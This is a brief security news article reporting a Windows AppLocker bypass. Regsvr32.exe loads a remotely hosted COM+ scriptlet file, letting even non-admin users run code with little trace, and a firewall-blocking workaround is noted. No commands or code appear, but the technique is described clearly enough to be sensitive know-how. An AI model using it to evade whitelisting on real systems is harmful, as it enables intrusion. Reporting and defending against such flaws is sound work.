A new security flaw has been found in Windows that allows users to bypass Windows AppLocker protection systems that could result in remote code execution.
By using the Windows command line utility Regsvr32.exe, security researcher Casey Smith was able to circumvent AppLocker's whitelist protections to point to a file or location controlled by a possible attacker. The security flaw affects business editions of Windows 7, 8, and 10 and can be utilised to run any app on a PC running Windows.
Smith noted that the flaw is able to be exploited even by a user that does not have administrator rights or privileged access. He detailed his findings in a blog post where he illustrated that COM+ scripts can be used to bypass AppLocker. These scripts are essentially XML documents that are responsible for registering COM objects used by the internal system of a Windows PC.
The exploit also operates without the need for tampering on the PC which leaves little evidence to suggest that an attack even occurred.
COM+ scripts, which are also known as .SCT files, are not bound to local access and can be deployed remotely. Smith was able to pull up the script remotely by hosting the .SCT file in a location he controlled: “It's not well documented that Regsvr32.exe can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the element.”
Smith has made a proof of concept code available on GitHub for users who want to learn more about how the exploit works. As a patch is not currently available for the security flaw, users can protect themselves by blocking Regsvr32.exe in Windows Firewall.